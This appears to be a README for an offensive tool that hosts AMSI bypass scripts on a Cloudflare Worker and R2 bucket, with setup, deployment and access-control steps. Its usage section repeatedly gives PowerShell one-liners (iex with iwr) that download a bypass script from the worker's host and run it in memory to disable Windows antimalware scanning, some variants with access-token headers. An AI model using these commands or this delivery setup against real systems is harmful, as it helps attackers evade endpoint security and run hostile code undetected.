Easy access to your AMSI bypass scripts with Cloudflare Workers and an R2 bucket. If no payload id is given, the worker selects one randomly.
A Cloudflare Worker function that selects an AMSI bypass file from a folder in a Cloudflare R2 bucket. The idea came from Flangvik's AMSI.fail.
- Uses Cloudflare Workers and R2 (the free tier is enough)
- Protect your endpoint behind Cloudflare Zero Trust (free for 1-50 users)
- Deploy with GitHub Actions
- A Cloudflare account (you will need your account id)
- A Cloudflare API token (see the Cloudflare docs)
- An R2 bucket
- In your new R2 bucket, a folder that will contain your AMSI bypass scripts. And obviously... add your scripts to that folder.
- A fork or clone of the project
- The GitHub repository secrets set up
- A domain set up in Cloudflare, to use the custom domain feature
- You don't have to make any modification in `wrangler.toml` (except if you want to change the name of your worker or if you don't want to use a custom domain). The GitHub secrets are used to fill in the `wrangler.toml` file at deploy time.

Note: to use the worker without a custom domain (not recommended), you will need to modify 2 things:
- remove the 3rd `sed` command in `.github/workflows/deploy.yml`
- remove the `route` section in `wrangler.toml`
```shell
# fork the project
# set up secrets, R2, etc.
git clone https://github.com/<your-user>/AMSI-R2.git
cd AMSI-R2
# ...
git push -u origin main
# then check your worker in the Cloudflare interface
```
```
# random script
curl "https://subdomain.yourdomain.com/<folder-name>"
iex(iwr -UseBasicParsing -Uri 'https://subdomain.yourdomain.com/<folder-name>');
# specific AMSI bypass script
curl "https://subdomain.yourdomain.com/<folder-name>?payload=<the-payload-id>"
iex(iwr -UseBasicParsing -Uri 'https://subdomain.yourdomain.com/<folder-name>?payload=<the-payload-id>');

### example
curl "https://amsi-r2.example.com/amsibypass"
iex(iwr -UseBasicParsing -Uri 'https://amsi-r2.example.com/amsibypass');
# with a payload id
curl "https://amsi-r2.example.com/amsibypass?payload=2"
iex(iwr -UseBasicParsing -Uri 'https://amsi-r2.example.com/amsibypass?payload=2');
```
- Generate a service auth token.
- Add the worker domain in the Cloudflare Zero Trust application section. During the creation, set up a rule that allows your service token.

```
# commands to access the endpoint behind Zero Trust
curl "https://amsi-r2.example.com/amsibypass" -H "CF-Access-Client-Id: <your-CF-Access-Client-Id>" -H "CF-Access-Client-Secret: <your-CF-Access-Client-Secret>"
iex(iwr -UseBasicParsing -Uri 'https://amsi-r2.example.com/amsibypass' -Headers @{'CF-Access-Client-Id' = '<your-CF-Access-Client-Id>'; 'CF-Access-Client-Secret' = '<your-CF-Access-Client-Secret>'});
# with a payload id
curl "https://amsi-r2.example.com/amsibypass?payload=2" -H "CF-Access-Client-Id: <your-CF-Access-Client-Id>" -H "CF-Access-Client-Secret: <your-CF-Access-Client-Secret>"
iex(iwr -UseBasicParsing -Uri 'https://amsi-r2.example.com/amsibypass?payload=2' -Headers @{'CF-Access-Client-Id' = '<your-CF-Access-Client-Id>'; 'CF-Access-Client-Secret' = '<your-CF-Access-Client-Secret>'});
```
Integrate the logic/obfuscation of AMSI.fail